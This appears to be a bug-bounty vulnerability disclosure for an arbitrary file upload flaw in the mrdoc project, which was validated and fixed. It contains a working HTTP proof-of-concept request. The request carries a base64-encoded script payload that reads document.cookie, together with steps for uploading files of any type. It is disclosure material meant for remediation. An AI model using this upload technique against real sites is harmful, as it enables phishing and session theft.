Unrestricted Upload of File with Dangerous Type in zmister2016/mrdoc

Valid

Reported on

Oct 16th 2021


Description

● Arbitrary file upload at /upload_doc_img/ ● An attacker could abuse this vuln ○ For a html , could do phishing ○ For a py, may lead to Remote Code Execution(by overwrting the existing Django py files, not proved yet)

Proof of Concept

Arbitrary file upload, HTML for instance

POST /upload_doc_img/ HTTP/1.1
Host: mrdoc.zmister.com
Content-Length: 175
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://mrdoc.zmister.com
Referer: http://mrdoc.zmister.com/create_doc/?pid=930
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Hm_lvt_95f55ea1c5936e35e732966bef35e4a5=1634395760; csrftoken=b4FuQm8mnBKS8oZPUlF9HuKamFy7qXCow0jeuGXgcTdFhhYWOrbJf2G5MuxTPj0Z; sessionid=mu3ptwhqzhmqnnmywvi3jpiwzybpx91b; Hm_lpvt_95f55ea1c5936e35e732966bef35e4a5=1634400403
Connection: close

csrfmiddlewaretoken=RXRaq7FYHMjmn0jJynWc6X8WQWXPmQVacTvU4ruSw4M9wTiQstsMEv4RgLWBLcjL&base=data%3Aimage%2Fhtml%3Bbase64%2CPFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ%2b

Notice the base param, which contains:

data:image/html;base64,PFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ+

data:image/,necessary padding chars ● html,file type you want to upload ● ;base64,,necessary padding chars ● PFNDUklQVD5hbGVydChkb2N1bWVudC5jb29raWUpPC9TQ1JJUFQ+,calculated by base64([file_content])

PoC URL: ● HTML:http://mrdoc.zmister.com/media/202110/2021-10-17_011214_240722.html

image ● Py,http://mrdoc.zmister.com/media/202110/2021-10-17_011207_785587.py

Impact

This vulnerability is capable of ● Uploading Files of any types ○ Do phishing(abusing the trusted domain) ○ May lead to Remote Code Execution(by overwrting the existing Django py files, not proved yet)

recommended fix

● Restrict the file-type, only allow PNG、JPG and so on... ● Fixed Content-Type of response when rendering http://mrdoc.zmister.com/media/*, should be set to image/png forcely for example

We have contacted a member of the zmister2016/mrdoc team and are waiting to hear back a month ago
zmister2016 validated this vulnerability a month ago
hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
zmister2016 confirmed that a fix has been merged on dcb4fc a month ago
zmister2016 has been awarded the fix bounty